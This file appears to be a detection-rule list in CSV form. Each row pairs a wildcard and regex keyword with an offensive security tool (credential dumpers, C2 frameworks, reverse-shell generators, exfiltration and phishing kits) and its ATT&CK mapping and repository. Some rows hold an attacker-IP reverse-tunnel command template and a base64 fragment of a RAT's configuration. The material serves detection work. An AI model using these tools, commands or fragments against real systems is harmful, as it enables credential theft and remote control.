"*cisco2john.pl*",".{0,1000}cisco2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*CiscoCXSecurity/linikatz*",".{0,1000}CiscoCXSecurity\/linikatz.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*cisco-phone-query.sh*",".{0,1000}cisco\-phone\-query\.sh.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*citronneur/pamspy*",".{0,1000}citronneur\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*citronneur/pamspy/releases*",".{0,1000}citronneur\/pamspy\/releases.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cjelfplplebdjjenllpjcblmjkfcffne*",".{0,1000}cjelfplplebdjjenllpjcblmjkfcffne.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*cjm00n/EvilSln*",".{0,1000}cjm00n\/EvilSln.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*Ck5PX0lQX0hPU1QgPSAnZ29vZ2xlY2hyb21lYXV0by5zZXJ2ZWlyYy5jb20nCkxIT1NUID0gJzE5Mi4xNjguMS4zJwpMUE9SVCA9IDQ0MwpUSU1FX1NMRUVQID0gMTAKClRFTVBfUEFUSCA9IHRlbXBmaWxlLmdldHRlbXBkaXIoKQpSRUdfUEFUSCA9IHIiU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIgpSRUdfTkFNRSA9ICJHb29nbGVDaHJvbWVBdXRvTGF1bmNoXzk5MjEzNjYxMDJXRUFEMjEzMTJFU0FEMzEzMTIiClJFR19WQUxVRSA*",".{0,1000}Ck5PX0lQX0hPU1QgPSAnZ29vZ2xlY2hyb21lYXV0by5zZXJ2ZWlyYy5jb20nCkxIT1NUID0gJzE5Mi4xNjguMS4zJwpMUE9SVCA9IDQ0MwpUSU1FX1NMRUVQID0gMTAKClRFTVBfUEFUSCA9IHRlbXBmaWxlLmdldHRlbXBkaXIoKQpSRUdfUEFUSCA9IHIiU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIgpSRUdfTkFNRSA9ICJHb29nbGVDaHJvbWVBdXRvTGF1bmNoXzk5MjEzNjYxMDJXRUFEMjEzMTJFU0FEMzEzMTIiClJFR19WQUxVRSA.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*class Plugin::Nemesis < Msf::Plugin*",".{0,1000}class\sPlugin\:\:Nemesis\s\<\sMsf\:\:Plugin.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*class ReverseBash*",".{0,1000}class\sReverseBash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*class T2WRPCServer(*",".{0,1000}class\sT2WRPCServer\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*",".{0,1000}Cleanup\-57BFF48E\-24FB\-48E9\-A390\-AC62ADF38B07\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*clear_cmd",".{0,1000}clear_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*clear_command_history.py*",".{0,1000}clear_command_history\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*clear_me_from_history()?*",".{0,1000}clear_me_from_history\(\)\?.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*ClearEventlog.vbs*",".{0,1000}ClearEventlog\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*ClearEventlog.vbs*",".{0,1000}ClearEventlog\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*clem9669/hashcat-rule*",".{0,1000}clem9669\/hashcat\-rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_case.rule*",".{0,1000}clem9669_case\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_large.rule*",".{0,1000}clem9669_large\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_medium.rule*",".{0,1000}clem9669_medium\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_small.rule*",".{0,1000}clem9669_small\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*clem9669_wordlist_medium.7z*",".{0,1000}clem9669_wordlist_medium\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*clem9669_wordlist_small.7z*",".{0,1000}clem9669_wordlist_small\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*-cli install github *",".{0,1000}\-cli\sinstall\sgithub\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*-cli install github *Apollo.*",".{0,1000}\-cli\sinstall\sgithub\s.{0,1000}Apollo\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*-cli payload start *",".{0,1000}\-cli\spayload\sstart\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*click_to_exploit.docx*",".{0,1000}click_to_exploit\.docx.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" "*clickjack_attack.html*",".{0,1000}clickjack_attack\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*clickjack_victim.html*",".{0,1000}clickjack_victim\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*clickme*exploit.html*",".{0,1000}clickme.{0,1000}exploit\.html.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","106","29","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*",".{0,1000}client\s\$ATTACKER\-IP\:\$ATTACKER\-PORT\sR\:\$PORT\:socks.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*client.py --server-ip * --server-port *",".{0,1000}client\.py\s\-\-server\-ip\s.{0,1000}\s\-\-server\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*client.py*--domain*--hashes*",".{0,1000}client\.py.{0,1000}\-\-domain.{0,1000}\-\-hashes.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*ClipboardImplant*",".{0,1000}ClipboardImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*clipboardinject.*",".{0,1000}clipboardinject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*clipboardinject.x64*",".{0,1000}clipboardinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*clipboardinject.x86*",".{0,1000}clipboardinject\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*clipboard-monitor *",".{0,1000}clipboard\-monitor\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*ClipboardWindow-Inject*",".{0,1000}ClipboardWindow\-Inject.{0,1000}","offensive_tool_keyword","cobaltstrike","CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BronzeTicket/ClipboardWindow-Inject","1","1","N/A","10","10","63","11","2022-09-15T01:41:39Z","2022-09-14T15:55:06Z" "*clipmon.sln*",".{0,1000}clipmon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*clndh3qilvdv6403g1n0hs3rhd6xpfmjn.oast.online*",".{0,1000}clndh3qilvdv6403g1n0hs3rhd6xpfmjn\.oast\.online.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*cloakify*",".{0,1000}cloakify.{0,1000}","offensive_tool_keyword","cloakify","CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.","T1001 - T1003 - T1027 - T1036 - T1048 - T1052","TA0010","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF/Cloakify","1","0","N/A","N/A","10","1496","228","2020-11-24T05:25:04Z","2016-05-07T04:52:26Z" "*CloakNDaggerC2-main*",".{0,1000}CloakNDaggerC2\-main.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*cloc.exe --exclude-dir*",".{0,1000}cloc\.exe\s\-\-exclude\-dir.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*cloud_enum-master.zip*",".{0,1000}cloud_enum\-master\.zip.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*cloudfail.py --target seo.com --tor*",".{0,1000}cloudfail\.py\s\-\-target\sseo\.com\s\-\-tor.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudFilterEOP.exe*",".{0,1000}cloudFilterEOP\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Cloudflared and Loclx have started successfully!*",".{0,1000}Cloudflared\sand\sLoclx\shave\sstarted\ssuccessfully!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*Cloudflared has started successfully!*",".{0,1000}Cloudflared\shas\sstarted\ssuccessfully!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*cloudmapper collect --account parent --profile parent*",".{0,1000}cloudmapper\scollect\s\-\-account\sparent\s\-\-profile\sparent.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*",".{0,1000}cloudmapper\sconfigure\sadd\-account\s\-\-config\-file\sconfig\.json\s\-\-name\sparent\s\-\-id\sXXX\s\-\-default\strue.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 